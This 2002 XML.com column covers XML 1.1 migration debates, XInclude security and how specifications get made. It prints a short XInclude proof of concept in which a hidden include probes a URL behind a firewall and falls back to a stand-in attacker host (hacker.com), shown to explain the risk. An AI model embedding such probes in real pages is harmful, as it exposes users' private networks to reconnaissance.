XML.com: XML From the Inside Out

Community and Specifications

October 30, 2002

In last week's column I looked at the XML development community's reaction to the XML 1.1 Candidate Recommendation. The changes that generated the most developer interest were Unicode character normalization, newly permissible control characters, and new line-ending rules. The pressure to migrate to XML 1.1 is likely to be greatest for XML applications that primarily consume XML. Finally, I suggested that the key to XML 1.1 migration lies with the XML infrastructure vendors, particularly XML parser providers.

In this week's column I return to pick up a bit more of the community's debate about XML 1.1 before reviewing several other matters, including XInclude security and what processes or methodologies make for good XML specifications.

SAX Feature URIs and XML 1.1

Rick Jelliffe suggested that, in order to handle XML 1.1 properly, two SAX feature URIs need to be declared: first, http://xml.org/sax/features/xml1.1, which says whether the parser can parse XML 1.1; second, http://xml.org/sax/features/normalization, which says whether the parser supports Unicode character normalization. John Cowan pointed out that most existing XML documents can be migrated from 1.0 to 1.1 simply by updating the version declaration -- and since an XML 1.1 document must declare itself as such, "There is no such thing," Cowan said, "as a document that is both well-formed 1.0 and well-formed 1.1". So, at least in that limited sense, there is a greater difference between XML 1.0 and 1.1 than there was between XML 1.0 and SGML.
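Neither of Jelliffe's URIs was ever adopted, so probing a parser for them today simply exercises SAX's feature machinery: a parser signals a URI it does not know by raising a "not recognized" error. A minimal sketch, using Python's stdlib xml.sax rather than the Java SAX the list was discussing:

```python
# Probe a SAX parser for Jelliffe's *proposed* feature URIs. These URIs
# were never standardized, so a stock parser is expected to reject them;
# the point is how SAX signals an unrecognized feature.
import xml.sax

XML11_FEATURE = "http://xml.org/sax/features/xml1.1"            # proposed only
NORMALIZATION_FEATURE = "http://xml.org/sax/features/normalization"  # proposed only

def supports(feature_uri):
    """Return True only if the default parser recognizes and enables the feature."""
    parser = xml.sax.make_parser()
    try:
        return bool(parser.getFeature(feature_uri))
    except xml.sax.SAXNotRecognizedException:
        # The parser has never heard of this feature URI.
        return False

for uri in (XML11_FEATURE, NORMALIZATION_FEATURE):
    print(uri, "->", supports(uri))
```

With the stdlib's expat-based parser, both proposed URIs come back unsupported, which is exactly the situation the discussion was trying to remedy.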

Elliotte Rusty Harold disagreed with Cowan's claim that no XML documents may be both 1.1 and 1.0: "There is nothing here that requires 1.0 parsers to signal an error when they encounter a 1.1 document...it is possible to have a document that is both well-formed 1.0 XML and well-formed 1.1 XML". But there are always the specification errata to consult, which Cowan claimed settled the matter. Harold's response expresses, I think, a common frustration with the W3C -- "Another erratum that rewrites history because the working group changed its mind. Sorry. I don't accept such errata as normative. The spec is clear and unambiguous. There is no plausible argument that the original spec made a mistake. The people who wrote the spec knew what they were writing and why they were writing it. Now, retroactively, somebody's decided they were wrong, and they're going to fix it". Or, as Andrew Watt put it: "It is one of the recurring problems of W3C specification documents that WG members take it to mean what they intended it to mean while...those who take the time to read the document...have to go by...what was stated..."

John Cowan's final word on the matter is representative of what seems to be a growing sense of the W3C's tendency to make unilateral pronouncements in such matters. "Like it or not," Cowan said, "XML 1.0, like all W3C recommendations, is a living document".

How Secure is XInclude?

Inclusion mechanisms and the wild, woolly Web often combine to create security problems disproportionate to their utility. One trouble with URLs is that they are, well, universal, and just about anyone can put just about anything at the end of one. Including devious attempts to steal your cookie file, your checking account, your children's toys, and your /etc/passwd file. Nasty stuff.

So how secure is XInclude? Elliotte Rusty Harold started a conversation with that question. The general response to Harold's example and analysis is that XInclude is about as vulnerable as other browser-based inclusion mechanisms -- mostly JavaScript hacks, but also external entity references.

Harold's example (slightly simplified from the original) is worth looking at in some detail --

<html xmlns:xi="http://www.w3.org/2001/XInclude">
    <body>
      Here's what the user normally sees
      <span style="display: none">
        <xi:include parse="text" href="http://www.behindthefirewall.com/someURL">
          <xi:fallback>
            <xi:include parse="text"
                        href="http://www.hacker.com/?someURL=doesNotExist" />
          </xi:fallback>
        </xi:include>
      </span>
    </body>
</html>

This allows a malicious site to check for the presence of files behind the firewall. "The biggest problem" with this kind of attack, Harold notes, "is that the attacker must have some good guesses as to likely local URLs, and also some reason to want to know them; but it seems to have the potential to expose information from behind the firewall that the user might not wish exposed". Such guesses are often not hard to make.

It's a subject which will likely see much more discussion from the XML development and browser-making communities.

How to Make Good XML Specs, Or Is James Clark Required?

James Clark probably deserves all the adulation he gets in markup circles. Getting the adulation you deserve is unobjectionable. But adulation is the sort of thing which easily gets out of hand. Thomas Passin asked, perhaps mostly tongue in cheek, whether it takes James Clark to write a decent XML specification.

Passin's real point, I take it, was to ask about ways, good and bad, of creating specifications, which is an important issue in the XML world. The great irony of Passin's question is that XML got started in part because SGML was so complicated that, or so it sometimes seemed at the time, only James Clark could write a fully compliant, free, well-performing SGML parser.

The real questions about specification creation are whether some people, including James Clark, are uniquely good at making specs, whether there are some ways of making them which lead to better outcomes than other ways, and whether the good modes of spec creation can be more widely implemented.

David Megginson suggested four rules for getting good specifications, none of which should be too surprising from someone who led the development of SAX, still the most successful XML spec driven purely by the XML development community. (Though eventually it will probably share this title with RELAX NG.) Megginson's Four Laws are

  1. Simplicity succeeds
  2. Process is poison
  3. Code first, then specify
  4. Almost every new spec fails anyway

Michael Kay suggested that one of the important differences is whether the specification is driven by corporate or non-corporate interests:

When individuals do it, primarily for intellectual satisfaction rather than to make money, then it comes out anywhere from brilliant to awful depending on the skills of the individual. And if it's awful then everyone ignores it. When corporations do it for commercial profit, then it comes out usable but mediocre.

Corporate backing isn't a predictor of specification success, but it does tend to ensure that a specification gets a decent hearing. This is a point Simon St. Laurent echoed, "Individuals creating specs face a serious uphill battle in getting their proposals noticed, much less implemented."

After a relatively quiet patch, it looks like XML-DEV is starting to heat up again. One hopes it will return to breaking new ground regularly, rather than getting bogged down again in classic and, at this point, interminable debates.